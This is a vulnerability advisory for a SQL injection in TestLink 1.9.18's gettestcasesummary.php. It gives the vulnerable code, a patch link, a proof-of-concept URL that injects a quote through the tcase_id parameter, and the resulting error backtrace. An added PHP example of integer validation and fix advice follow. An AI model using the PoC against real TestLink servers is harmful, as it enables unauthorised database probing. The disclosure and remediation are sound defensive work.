Testlink 1.9.18 gettestcasesummary.php SQL Injection 0day

2018.06.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Affected software: Testlink 1.9.18 and prior
Credit: Maksymilian Arciemowicz (CXSECURITY)

Affected code:
----------------
$tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null;
$tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0;
$info = '';
if( !is_null($tcase_id) )
{
  if($tcversion_id > 0 )
  {
    $tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id);
----------------

Patch:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3

PoC:
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27

Error message and SQL Syntax:
==============================================================================
DB Access Error - debug_print_backtrace() OUTPUT START
ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200)
Having this additional Information could be useful for reporting issue to development TEAM.
==============================================================================
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]
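The affected code passes `tcase_id` and `tcversion_id` from `$_REQUEST` to the query layer as raw strings, which is how the quote in the PoC reaches `WHERE NH_TCV.parent_id = 1'`. The following is an added example of validating both parameters as integers at the entry point; it is not the project's patch or code from the advisory, and the helper name `request_int` and the sample requests are hypothetical.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: return $request[$key] as a non-negative integer,
 * or $default when the key is absent. Anything that is not a plain
 * decimal integer (for example "1'" or an array) is rejected.
 */
function request_int(array $request, string $key, ?int $default): ?int
{
    if (!isset($request[$key])) {
        return $default;
    }
    $value = filter_var(
        $request[$key],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]
    );
    if ($value === false) {
        throw new InvalidArgumentException("$key must be a non-negative integer");
    }
    return $value;
}

// Constructed sample requests; the second uses the PoC value from the advisory.
$samples = [
    ['tcase_id' => '1', 'tcversion_id' => '3'],
    ['tcase_id' => "1'"],
    ['tcase_id' => ['1']],
    ['tcversion_id' => '2'],
];

foreach ($samples as $request) {
    try {
        // Same defaults as the affected code: null for tcase_id, 0 for tcversion_id.
        $tcase_id     = request_int($request, 'tcase_id', null);
        $tcversion_id = request_int($request, 'tcversion_id', 0);
        // Only typed integers reach this point, so the value that ends up in
        // the WHERE clause can no longer carry SQL syntax.
        printf("accepted tcase_id=%s tcversion_id=%d\n",
               var_export($tcase_id, true), $tcversion_id);
    } catch (InvalidArgumentException $e) {
        printf("rejected: %s\n", $e->getMessage());
    }
}
```

Input validation at the entry point is one layer; the query layer should still cast or bind the value it interpolates, and the debug backtrace shown above should not be returned to clients, since it discloses server paths and the query text.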

References:

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3



Copyright 2018, cxsecurity.com

 
